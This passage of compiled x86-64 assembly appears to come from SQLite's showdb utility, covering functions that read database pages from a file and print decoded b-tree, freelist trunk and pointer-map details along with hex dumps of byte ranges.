LBB4_22: ## in Loop: Header=BB4_19 Depth=1
leaq L_.str.60(%rip), %rax
movq %rax, -280(%rbp) ## 8-byte Spill
jmp LBB4_23
LBB4_23: ## in Loop: Header=BB4_19 Depth=1
movl -268(%rbp), %esi ## 4-byte Reload
movq -280(%rbp), %rdx ## 8-byte Reload
leaq L_.str.59(%rip), %rdi
movb $0, %al
callq _printf
movq _zPageUse(%rip), %rax
movslq -220(%rbp), %rcx
movq (%rax,%rcx,8), %rdi
callq _sqlite3_free
## %bb.24: ## in Loop: Header=BB4_19 Depth=1
movl -220(%rbp), %eax
addl $1, %eax
movl %eax, -220(%rbp)
jmp LBB4_19
LBB4_25:
movq _zPageUse(%rip), %rdi
callq _sqlite3_free
movq $0, _zPageUse(%rip)
LBB4_26:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB4_28
## %bb.27:
addq $288, %rsp ## imm = 0x120
popq %rbp
retq
LBB4_28:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function ptrmap_coverage_report
_ptrmap_coverage_report: ## @ptrmap_coverage_report
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movq %rdi, -8(%rbp)
cmpl $1, _mxPage(%rip)
jge LBB5_2
## %bb.1:
leaq L_.str.51(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB5_20
LBB5_2:
xorl %edi, %edi
movl $100, %esi
callq _getContent
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movzbl 55(%rax), %eax
cmpl $0, %eax
jne LBB5_4
## %bb.3:
leaq L_.str.77(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB5_20
LBB5_4:
movl _pagesize(%rip), %eax
movq -24(%rbp), %rcx
movzbl 20(%rcx), %ecx
subl %ecx, %eax
movl %eax, -36(%rbp)
movl -36(%rbp), %eax
movl $5, %ecx
cltd
idivl %ecx
movl %eax, -40(%rbp)
movq -24(%rbp), %rdi
callq _free
leaq L_.str.78(%rip), %rdi
movl $1, %esi
movb $0, %al
callq _printf
movl $2, -12(%rbp)
LBB5_5: ## =>This Loop Header: Depth=1
## Child Loop BB5_7 Depth 2
movl -12(%rbp), %eax
cmpl _mxPage(%rip), %eax
jg LBB5_20
## %bb.6: ## in Loop: Header=BB5_5 Depth=1
movl -12(%rbp), %esi
movl -12(%rbp), %edx
addl $1, %edx
movl -12(%rbp), %ecx
addl -40(%rbp), %ecx
leaq L_.str.79(%rip), %rdi
movb $0, %al
callq _printf
movl -12(%rbp), %edi
subl $1, %edi
imull _pagesize(%rip), %edi
movl -36(%rbp), %esi
callq _getContent
movq %rax, -32(%rbp)
movl $0, -44(%rbp)
LBB5_7: ## Parent Loop BB5_5 Depth=1
## => This Inner Loop Header: Depth=2
movl -44(%rbp), %ecx
addl $5, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl -36(%rbp), %ecx
movb %al, -61(%rbp) ## 1-byte Spill
jg LBB5_9
## %bb.8: ## in Loop: Header=BB5_7 Depth=2
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -68(%rbp) ## 4-byte Spill
movl -44(%rbp), %eax
movl $5, %ecx
cltd
idivl %ecx
movl %eax, %ecx
movl -68(%rbp), %eax ## 4-byte Reload
addl %ecx, %eax
cmpl _mxPage(%rip), %eax
setle %al
movb %al, -61(%rbp) ## 1-byte Spill
LBB5_9: ## in Loop: Header=BB5_7 Depth=2
movb -61(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB5_10
jmp LBB5_18
LBB5_10: ## in Loop: Header=BB5_7 Depth=2
leaq L_.str.60(%rip), %rax
movq %rax, -56(%rbp)
movq -32(%rbp), %rcx
movslq -44(%rbp), %rax
leaq 1(%rax,%rcx), %rdi
callq _decodeInt32
movl %eax, -60(%rbp)
movq -32(%rbp), %rax
movslq -44(%rbp), %rcx
movzbl (%rax,%rcx), %eax
decl %eax
movl %eax, %ecx
movq %rcx, -80(%rbp) ## 8-byte Spill
subl $4, %eax
ja LBB5_16
## %bb.21: ## in Loop: Header=BB5_7 Depth=2
movq -80(%rbp), %rax ## 8-byte Reload
leaq LJTI5_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB5_11: ## in Loop: Header=BB5_7 Depth=2
leaq L_.str.80(%rip), %rax
movq %rax, -56(%rbp)
jmp LBB5_16
LBB5_12: ## in Loop: Header=BB5_7 Depth=2
leaq L_.str.81(%rip), %rax
movq %rax, -56(%rbp)
jmp LBB5_16
LBB5_13: ## in Loop: Header=BB5_7 Depth=2
leaq L_.str.82(%rip), %rax
movq %rax, -56(%rbp)
jmp LBB5_16
LBB5_14: ## in Loop: Header=BB5_7 Depth=2
leaq L_.str.83(%rip), %rax
movq %rax, -56(%rbp)
jmp LBB5_16
LBB5_15: ## in Loop: Header=BB5_7 Depth=2
leaq L_.str.84(%rip), %rax
movq %rax, -56(%rbp)
LBB5_16: ## in Loop: Header=BB5_7 Depth=2
movl -12(%rbp), %esi
addl $1, %esi
movl -44(%rbp), %eax
movl $5, %ecx
cltd
idivl %ecx
addl %eax, %esi
movq -56(%rbp), %rdx
movl -60(%rbp), %ecx
leaq L_.str.85(%rip), %rdi
movb $0, %al
callq _printf
## %bb.17: ## in Loop: Header=BB5_7 Depth=2
movl -44(%rbp), %eax
addl $5, %eax
movl %eax, -44(%rbp)
jmp LBB5_7
LBB5_18: ## in Loop: Header=BB5_5 Depth=1
movq -32(%rbp), %rdi
callq _free
## %bb.19: ## in Loop: Header=BB5_5 Depth=1
movl -40(%rbp), %eax
addl $1, %eax
addl -12(%rbp), %eax
movl %eax, -12(%rbp)
jmp LBB5_5
LBB5_20:
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L5_0_set_11, LBB5_11-LJTI5_0
.set L5_0_set_12, LBB5_12-LJTI5_0
.set L5_0_set_13, LBB5_13-LJTI5_0
.set L5_0_set_14, LBB5_14-LJTI5_0
.set L5_0_set_15, LBB5_15-LJTI5_0
LJTI5_0:
.long L5_0_set_11
.long L5_0_set_12
.long L5_0_set_13
.long L5_0_set_14
.long L5_0_set_15
.end_data_region
## -- End function
.p2align 4, 0x90 ## -- Begin function getContent
_getContent: ## @getContent
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl -8(%rbp), %eax
addl $32, %eax
movslq %eax, %rdi
callq _malloc
movq %rax, -16(%rbp)
cmpq $0, -16(%rbp)
jne LBB6_2
## %bb.1:
callq _out_of_memory
LBB6_2:
movq -16(%rbp), %rdi
movl -8(%rbp), %eax
addl $32, %eax
movslq %eax, %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
movl _db(%rip), %edi
movslq -4(%rbp), %rsi
xorl %edx, %edx
callq _lseek
movl _db(%rip), %edi
movq -16(%rbp), %rsi
movslq -8(%rbp), %rdx
callq _read
movslq -8(%rbp), %rcx
cmpq %rcx, %rax
jge LBB6_4
## %bb.3:
movq -16(%rbp), %rdi
movslq -8(%rbp), %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
LBB6_4:
movq -16(%rbp), %rax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function decode_btree_page
_decode_btree_page: ## @decode_btree_page
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $160, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -56(%rbp)
movl %esi, -60(%rbp)
movl %edx, -64(%rbp)
movq %rcx, -72(%rbp)
leaq L_.str.86(%rip), %rax
movq %rax, -80(%rbp)
movl $0, -100(%rbp)
movl $0, -104(%rbp)
movl $-2, -108(%rbp)
movq $0, -120(%rbp)
movq -56(%rbp), %rax
movzbl (%rax), %eax
addl $-2, %eax
movl %eax, %ecx
movq %rcx, -152(%rbp) ## 8-byte Spill
subl $11, %eax
ja LBB7_5
## %bb.53:
movq -152(%rbp), %rax ## 8-byte Reload
leaq LJTI7_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB7_1:
leaq L_.str.87(%rip), %rax
movq %rax, -80(%rbp)
jmp LBB7_5
LBB7_2:
leaq L_.str.88(%rip), %rax
movq %rax, -80(%rbp)
jmp LBB7_5
LBB7_3:
leaq L_.str.89(%rip), %rax
movq %rax, -80(%rbp)
jmp LBB7_5
LBB7_4:
leaq L_.str.90(%rip), %rax
movq %rax, -80(%rbp)
LBB7_5:
jmp LBB7_6
LBB7_6: ## =>This Loop Header: Depth=1
## Child Loop BB7_13 Depth 2
movq -72(%rbp), %rax
cmpb $0, (%rax)
je LBB7_18
## %bb.7: ## in Loop: Header=BB7_6 Depth=1
movq -72(%rbp), %rax
movsbl (%rax), %eax
movl %eax, -156(%rbp) ## 4-byte Spill
subl $99, %eax
je LBB7_8
jmp LBB7_54
LBB7_54: ## in Loop: Header=BB7_6 Depth=1
movl -156(%rbp), %eax ## 4-byte Reload
subl $100, %eax
je LBB7_10
jmp LBB7_55
LBB7_55: ## in Loop: Header=BB7_6 Depth=1
movl -156(%rbp), %eax ## 4-byte Reload
subl $109, %eax
je LBB7_9
jmp LBB7_17
LBB7_8: ## in Loop: Header=BB7_6 Depth=1
movl $1, -100(%rbp)
jmp LBB7_17
LBB7_9: ## in Loop: Header=BB7_6 Depth=1
movl $1, -104(%rbp)
jmp LBB7_17
LBB7_10: ## in Loop: Header=BB7_6 Depth=1
movq -72(%rbp), %rax
movsbl 1(%rax), %edi
callq _isdigit
cmpl $0, %eax
jne LBB7_12
## %bb.11: ## in Loop: Header=BB7_6 Depth=1
movl $-1, -108(%rbp)
jmp LBB7_16
LBB7_12: ## in Loop: Header=BB7_6 Depth=1
movl $0, -108(%rbp)
LBB7_13: ## Parent Loop BB7_6 Depth=1
## => This Inner Loop Header: Depth=2
movq -72(%rbp), %rax
movsbl 1(%rax), %edi
callq _isdigit
cmpl $0, %eax
je LBB7_15
## %bb.14: ## in Loop: Header=BB7_13 Depth=2
movq -72(%rbp), %rax
addq $1, %rax
movq %rax, -72(%rbp)
imull $10, -108(%rbp), %eax
movq -72(%rbp), %rcx
movsbl (%rcx), %ecx
addl %ecx, %eax
subl $48, %eax
movl %eax, -108(%rbp)
jmp LBB7_13
LBB7_15: ## in Loop: Header=BB7_6 Depth=1
jmp LBB7_16
LBB7_16: ## in Loop: Header=BB7_6 Depth=1
jmp LBB7_17
LBB7_17: ## in Loop: Header=BB7_6 Depth=1
movq -72(%rbp), %rax
addq $1, %rax
movq %rax, -72(%rbp)
jmp LBB7_6
LBB7_18:
movq -56(%rbp), %rax
movzbl 3(%rax), %eax
shll $8, %eax
movq -56(%rbp), %rcx
movzbl 4(%rcx), %ecx
addl %ecx, %eax
movl %eax, -84(%rbp)
movq -56(%rbp), %rax
movzbl (%rax), %ecx
movb $1, %al
cmpl $2, %ecx
movb %al, -157(%rbp) ## 1-byte Spill
je LBB7_20
## %bb.19:
movq -56(%rbp), %rax
movzbl (%rax), %eax
cmpl $5, %eax
sete %al
movb %al, -157(%rbp) ## 1-byte Spill
LBB7_20:
movb -157(%rbp), %dl ## 1-byte Reload
movl $8, %eax
movl $12, %ecx
testb $1, %dl
cmovnel %ecx, %eax
movl %eax, -96(%rbp)
movl -108(%rbp), %eax
cmpl -84(%rbp), %eax
jl LBB7_22
## %bb.21:
movl -60(%rbp), %esi
movl -84(%rbp), %edx
leaq L_.str.91(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB7_50
LBB7_22:
movl -60(%rbp), %esi
leaq L_.str.92(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rdi
movq -80(%rbp), %rcx
xorl %esi, %esi
movl $1, %edx
callq _print_decode_line
movq -56(%rbp), %rdi
movl $1, %esi
movl $2, %edx
leaq L_.str.93(%rip), %rcx
callq _print_decode_line
movq -56(%rbp), %rdi
movl $3, %esi
movl $2, %edx
leaq L_.str.94(%rip), %rcx
callq _print_decode_line
movq -56(%rbp), %rdi
movl $5, %esi
movl $2, %edx
leaq L_.str.95(%rip), %rcx
callq _print_decode_line
movq -56(%rbp), %rdi
movl $7, %esi
movl $1, %edx
leaq L_.str.96(%rip), %rcx
callq _print_decode_line
movq -56(%rbp), %rax
movzbl (%rax), %eax
cmpl $2, %eax
je LBB7_24
## %bb.23:
movq -56(%rbp), %rax
movzbl (%rax), %eax
cmpl $5, %eax
jne LBB7_25
LBB7_24:
movq -56(%rbp), %rdi
movl $8, %esi
movl $4, %edx
leaq L_.str.97(%rip), %rcx
callq _print_decode_line
LBB7_25:
cmpl $-2, -108(%rbp)
jne LBB7_28
## %bb.26:
cmpl $0, -84(%rbp)
jle LBB7_28
## %bb.27:
leaq L_.str.98(%rip), %rdi
movb $0, %al
callq _printf
LBB7_28:
cmpl $0, -104(%rbp)
je LBB7_30
## %bb.29:
movslq _pagesize(%rip), %rdi
callq _malloc
movq %rax, -120(%rbp)
movq -120(%rbp), %rdi
movslq _pagesize(%rip), %rdx
movl $46, %esi
movq $-1, %rcx
callq ___memset_chk
movq -120(%rbp), %rdi
movslq -64(%rbp), %rdx
movl $49, %esi
movq $-1, %rcx
callq ___memset_chk
movq -120(%rbp), %rdi
movslq -64(%rbp), %rax
addq %rax, %rdi
movslq -96(%rbp), %rdx
movl $72, %esi
movq $-1, %rcx
callq ___memset_chk
movq -120(%rbp), %rdi
movl -64(%rbp), %eax
addl -96(%rbp), %eax
cltq
addq %rax, %rdi
movl -84(%rbp), %eax
shll $1, %eax
movslq %eax, %rdx
movl $80, %esi
movq $-1, %rcx
callq ___memset_chk
LBB7_30:
movl $0, -88(%rbp)
LBB7_31: ## =>This Inner Loop Header: Depth=1
movl -88(%rbp), %eax
cmpl -84(%rbp), %eax
jge LBB7_44
## %bb.32: ## in Loop: Header=BB7_31 Depth=1
movl -96(%rbp), %eax
movl -88(%rbp), %ecx
shll $1, %ecx
addl %ecx, %eax
movl %eax, -124(%rbp)
movq -56(%rbp), %rax
movslq -124(%rbp), %rcx
movzbl (%rax,%rcx), %eax
shll $8, %eax
movq -56(%rbp), %rcx
movl -124(%rbp), %edx
addl $1, %edx
movslq %edx, %rdx
movzbl (%rcx,%rdx), %ecx
addl %ecx, %eax
movl %eax, -124(%rbp)
movq -56(%rbp), %rax
movb (%rax), %al
movq -56(%rbp), %rsi
movl -124(%rbp), %ecx
subl -64(%rbp), %ecx
movslq %ecx, %rcx
addq %rcx, %rsi
movl -100(%rbp), %edx
leaq -136(%rbp), %rcx
movzbl %al, %edi
callq _describeCell
movq %rax, -144(%rbp)
cmpl $0, -104(%rbp)
je LBB7_36
## %bb.33: ## in Loop: Header=BB7_31 Depth=1
movq -120(%rbp), %rdi
movslq -124(%rbp), %rax
addq %rax, %rdi
movq -144(%rbp), %rdx
movl $42, %esi
movq $-1, %rcx
callq ___memset_chk
movq -120(%rbp), %rax
movslq -124(%rbp), %rcx
movb $91, (%rax,%rcx)
movq -120(%rbp), %rax
movslq -124(%rbp), %rcx
addq -144(%rbp), %rcx
subq $1, %rcx
movb $93, (%rax,%rcx)
leaq -48(%rbp), %rdi
movl -88(%rbp), %r8d
xorl %esi, %esi
movl $30, %edx
leaq L_.str.99(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq -48(%rbp), %rdi
callq _strlen
## kill: def $eax killed $eax killed $rax
movl %eax, -92(%rbp)
movslq -92(%rbp), %rax
movq -144(%rbp), %rcx
subq $2, %rcx
cmpq %rcx, %rax
jg LBB7_35
## %bb.34: ## in Loop: Header=BB7_31 Depth=1
movq -120(%rbp), %rdi
movl -124(%rbp), %eax
addl $1, %eax
cltq
addq %rax, %rdi
leaq -48(%rbp), %rsi
movslq -92(%rbp), %rdx
movq $-1, %rcx
callq ___memcpy_chk
LBB7_35: ## in Loop: Header=BB7_31 Depth=1
jmp LBB7_36
LBB7_36: ## in Loop: Header=BB7_31 Depth=1
cmpl $-2, -108(%rbp)
jne LBB7_38
## %bb.37: ## in Loop: Header=BB7_31 Depth=1
movl -124(%rbp), %esi
movl -88(%rbp), %edx
movq -136(%rbp), %rcx
leaq L_.str.100(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB7_42
LBB7_38: ## in Loop: Header=BB7_31 Depth=1
cmpl $-1, -108(%rbp)
je LBB7_40
## %bb.39: ## in Loop: Header=BB7_31 Depth=1
movl -108(%rbp), %eax
cmpl -88(%rbp), %eax
jne LBB7_41
LBB7_40: ## in Loop: Header=BB7_31 Depth=1
movq -56(%rbp), %rdi
movl -60(%rbp), %esi
movl -88(%rbp), %edx
movl -64(%rbp), %ecx
movl -124(%rbp), %r8d
subl -64(%rbp), %r8d
callq _decodeCell
LBB7_41: ## in Loop: Header=BB7_31 Depth=1
jmp LBB7_42
LBB7_42: ## in Loop: Header=BB7_31 Depth=1
jmp LBB7_43
LBB7_43: ## in Loop: Header=BB7_31 Depth=1
movl -88(%rbp), %eax
addl $1, %eax
movl %eax, -88(%rbp)
jmp LBB7_31
LBB7_44:
cmpl $0, -104(%rbp)
je LBB7_50
## %bb.45:
leaq L_.str.101(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -88(%rbp)
LBB7_46: ## =>This Inner Loop Header: Depth=1
movl -88(%rbp), %eax
cmpl _pagesize(%rip), %eax
jge LBB7_49
## %bb.47: ## in Loop: Header=BB7_46 Depth=1
movl -88(%rbp), %esi
movq -120(%rbp), %rdx
movslq -88(%rbp), %rax
addq %rax, %rdx
leaq L_.str.102(%rip), %rdi
movb $0, %al
callq _printf
## %bb.48: ## in Loop: Header=BB7_46 Depth=1
movl -88(%rbp), %eax
addl $64, %eax
movl %eax, -88(%rbp)
jmp LBB7_46
LBB7_49:
movq -120(%rbp), %rdi
callq _free
LBB7_50:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB7_52
## %bb.51:
addq $160, %rsp
popq %rbp
retq
LBB7_52:
callq ___stack_chk_fail
ud2
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L7_0_set_1, LBB7_1-LJTI7_0
.set L7_0_set_5, LBB7_5-LJTI7_0
.set L7_0_set_2, LBB7_2-LJTI7_0
.set L7_0_set_3, LBB7_3-LJTI7_0
.set L7_0_set_4, LBB7_4-LJTI7_0
LJTI7_0:
.long L7_0_set_1
.long L7_0_set_5
.long L7_0_set_5
.long L7_0_set_2
.long L7_0_set_5
.long L7_0_set_5
.long L7_0_set_5
.long L7_0_set_5
.long L7_0_set_3
.long L7_0_set_5
.long L7_0_set_5
.long L7_0_set_4
.end_data_region
## -- End function
.p2align 4, 0x90 ## -- Begin function decode_trunk_page
_decode_trunk_page: ## @decode_trunk_page
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl %edi, -24(%rbp)
movl %esi, -28(%rbp)
movl %edx, -32(%rbp)
movl %ecx, -36(%rbp)
LBB8_1: ## =>This Loop Header: Depth=1
## Child Loop BB8_4 Depth 2
cmpl $0, -24(%rbp)
jle LBB8_16
## %bb.2: ## in Loop: Header=BB8_1 Depth=1
movl -24(%rbp), %edi
subl $1, %edi
imull -28(%rbp), %edi
movl -28(%rbp), %esi
callq _getContent
movq %rax, -56(%rbp)
movl -24(%rbp), %esi
leaq L_.str.143(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rdi
xorl %esi, %esi
movl $4, %edx
leaq L_.str.144(%rip), %rcx
callq _print_decode_line
movq -56(%rbp), %rdi
movl $4, %edx
leaq L_.str.145(%rip), %rcx
movl %edx, %esi
callq _print_decode_line
cmpl $0, -32(%rbp)
je LBB8_12
## %bb.3: ## in Loop: Header=BB8_1 Depth=1
movq -56(%rbp), %rdi
addq $4, %rdi
callq _decodeInt32
movl %eax, -40(%rbp)
movl $0, -44(%rbp)
LBB8_4: ## Parent Loop BB8_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -44(%rbp), %eax
cmpl -40(%rbp), %eax
jge LBB8_9
## %bb.5: ## in Loop: Header=BB8_4 Depth=2
movq -56(%rbp), %rdi
movl -44(%rbp), %eax
shll $2, %eax
addl $8, %eax
cltq
addq %rax, %rdi
callq _decodeInt32
movl %eax, -60(%rbp)
leaq -18(%rbp), %rdi
movl -44(%rbp), %r8d
xorl %esi, %esi
movl $10, %edx
leaq L_.str.146(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq -18(%rbp), %rsi
movl -60(%rbp), %edx
leaq L_.str.147(%rip), %rdi
movb $0, %al
callq _printf
movl -44(%rbp), %eax
movl $5, %ecx
cltd
idivl %ecx
cmpl $4, %edx
jne LBB8_7
## %bb.6: ## in Loop: Header=BB8_4 Depth=2
leaq L_.str.22(%rip), %rdi
movb $0, %al
callq _printf
LBB8_7: ## in Loop: Header=BB8_4 Depth=2
jmp LBB8_8
LBB8_8: ## in Loop: Header=BB8_4 Depth=2
movl -44(%rbp), %eax
addl $1, %eax
movl %eax, -44(%rbp)
jmp LBB8_4
LBB8_9: ## in Loop: Header=BB8_1 Depth=1
movl -44(%rbp), %eax
movl $5, %ecx
cltd
idivl %ecx
cmpl $0, %edx
je LBB8_11
## %bb.10: ## in Loop: Header=BB8_1 Depth=1
leaq L_.str.22(%rip), %rdi
movb $0, %al
callq _printf
LBB8_11: ## in Loop: Header=BB8_1 Depth=1
jmp LBB8_12
LBB8_12: ## in Loop: Header=BB8_1 Depth=1
cmpl $0, -36(%rbp)
jne LBB8_14
## %bb.13: ## in Loop: Header=BB8_1 Depth=1
movl $0, -24(%rbp)
jmp LBB8_15
LBB8_14: ## in Loop: Header=BB8_1 Depth=1
movq -56(%rbp), %rdi
callq _decodeInt32
movl %eax, -24(%rbp)
LBB8_15: ## in Loop: Header=BB8_1 Depth=1
movq -56(%rbp), %rdi
callq _free
jmp LBB8_1
LBB8_16:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB8_18
## %bb.17:
addq $64, %rsp
popq %rbp
retq
LBB8_18:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function print_byte_range
_print_byte_range: ## @print_byte_range
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl %edx, -12(%rbp)
movl -12(%rbp), %eax
addl -8(%rbp), %eax
andl $-4096, %eax ## imm = 0xF000
cmpl $0, %eax
jne LBB9_2
## %bb.1:
leaq L_.str.13(%rip), %rax
movq %rax, -40(%rbp)
jmp LBB9_12
LBB9_2:
movl -12(%rbp), %eax
addl -8(%rbp), %eax
andl $-65536, %eax ## imm = 0xFFFF0000
cmpl $0, %eax
jne LBB9_4
## %bb.3:
leaq L_.str.14(%rip), %rax
movq %rax, -40(%rbp)
jmp LBB9_11
LBB9_4:
movl -12(%rbp), %eax
addl -8(%rbp), %eax
andl $-1048576, %eax ## imm = 0xFFF00000
cmpl $0, %eax
jne LBB9_6
## %bb.5:
leaq L_.str.15(%rip), %rax
movq %rax, -40(%rbp)
jmp LBB9_10
LBB9_6:
movl -12(%rbp), %eax
addl -8(%rbp), %eax
andl $-16777216, %eax ## imm = 0xFF000000
cmpl $0, %eax
jne LBB9_8
## %bb.7:
leaq L_.str.16(%rip), %rax
movq %rax, -40(%rbp)
jmp LBB9_9
LBB9_8:
leaq L_.str.17(%rip), %rax
movq %rax, -40(%rbp)
LBB9_9:
jmp LBB9_10
LBB9_10:
jmp LBB9_11
LBB9_11:
jmp LBB9_12
LBB9_12:
movl -4(%rbp), %edi
movl -8(%rbp), %esi
callq _getContent
movq %rax, -24(%rbp)
movl $0, -28(%rbp)
LBB9_13: ## =>This Loop Header: Depth=1
## Child Loop BB9_15 Depth 2
## Child Loop BB9_22 Depth 2
movl -28(%rbp), %eax
cmpl -8(%rbp), %eax
jge LBB9_33
## %bb.14: ## in Loop: Header=BB9_13 Depth=1
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -40(%rbp), %rsi
movl -28(%rbp), %edx
addl -12(%rbp), %edx
movb $0, %al
callq _fprintf
movl $0, -32(%rbp)
LBB9_15: ## Parent Loop BB9_13 Depth=1
## => This Inner Loop Header: Depth=2
movl -32(%rbp), %eax
cmpl _perLine(%rip), %eax
jge LBB9_21
## %bb.16: ## in Loop: Header=BB9_15 Depth=2
movl -28(%rbp), %eax
addl -32(%rbp), %eax
cmpl -8(%rbp), %eax
jle LBB9_18
## %bb.17: ## in Loop: Header=BB9_15 Depth=2
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.18(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB9_19
LBB9_18: ## in Loop: Header=BB9_15 Depth=2
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -24(%rbp), %rax
movl -28(%rbp), %ecx
addl -32(%rbp), %ecx
movslq %ecx, %rcx
movzbl (%rax,%rcx), %edx
leaq L_.str.19(%rip), %rsi
movb $0, %al
callq _fprintf
LBB9_19: ## in Loop: Header=BB9_15 Depth=2
jmp LBB9_20
LBB9_20: ## in Loop: Header=BB9_15 Depth=2
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB9_15
LBB9_21: ## in Loop: Header=BB9_13 Depth=1
movl $0, -32(%rbp)
LBB9_22: ## Parent Loop BB9_13 Depth=1
## => This Inner Loop Header: Depth=2
movl -32(%rbp), %eax
cmpl _perLine(%rip), %eax
jge LBB9_31
## %bb.23: ## in Loop: Header=BB9_22 Depth=2
movl -28(%rbp), %eax
addl -32(%rbp), %eax
cmpl -8(%rbp), %eax
jle LBB9_25
## %bb.24: ## in Loop: Header=BB9_22 Depth=2
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.20(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB9_29
LBB9_25: ## in Loop: Header=BB9_22 Depth=2
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -48(%rbp) ## 8-byte Spill
movq -24(%rbp), %rax
movl -28(%rbp), %ecx
addl -32(%rbp), %ecx
movslq %ecx, %rcx
movzbl (%rax,%rcx), %edi
callq _isprint
cmpl $0, %eax
je LBB9_27
## %bb.26: ## in Loop: Header=BB9_22 Depth=2
movq -24(%rbp), %rax
movl -28(%rbp), %ecx
addl -32(%rbp), %ecx
movslq %ecx, %rcx
movzbl (%rax,%rcx), %eax
movl %eax, -52(%rbp) ## 4-byte Spill
jmp LBB9_28
LBB9_27: ## in Loop: Header=BB9_22 Depth=2
movl $46, %eax
movl %eax, -52(%rbp) ## 4-byte Spill
jmp LBB9_28
LBB9_28: ## in Loop: Header=BB9_22 Depth=2
movq -48(%rbp), %rdi ## 8-byte Reload
movl -52(%rbp), %edx ## 4-byte Reload
leaq L_.str.21(%rip), %rsi
movb $0, %al
callq _fprintf
LBB9_29: ## in Loop: Header=BB9_22 Depth=2
jmp LBB9_30
LBB9_30: ## in Loop: Header=BB9_22 Depth=2
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB9_22
LBB9_31: ## in Loop: Header=BB9_13 Depth=1
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.22(%rip), %rsi
movb $0, %al
callq _fprintf
## %bb.32: ## in Loop: Header=BB9_13 Depth=1
movl _perLine(%rip), %eax
addl -28(%rbp), %eax
movl %eax, -28(%rbp)
jmp LBB9_13
LBB9_33:
movq -24(%rbp), %rax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function print_decode_line
_print_decode_line: ## @print_decode_line
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $160, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -120(%rbp)
movl %esi, -124(%rbp)
movl %edx, -128(%rbp)
movq %rcx, -136(%rbp)
movq -120(%rbp), %rax
movslq -124(%rbp), %rcx
movzbl (%rax,%rcx), %eax
movl %eax, -148(%rbp)
leaq -112(%rbp), %rdi
movl -124(%rbp), %r8d
movq -120(%rbp), %rax
movslq -124(%rbp), %rcx
movzbl (%rax,%rcx), %r9d
xorl %esi, %esi
movl $100, %edx
leaq L_.str.47(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq -112(%rbp), %rdi
callq _strlen
## kill: def $eax killed $eax killed $rax
movl %eax, -140(%rbp)
movl $1, -144(%rbp)
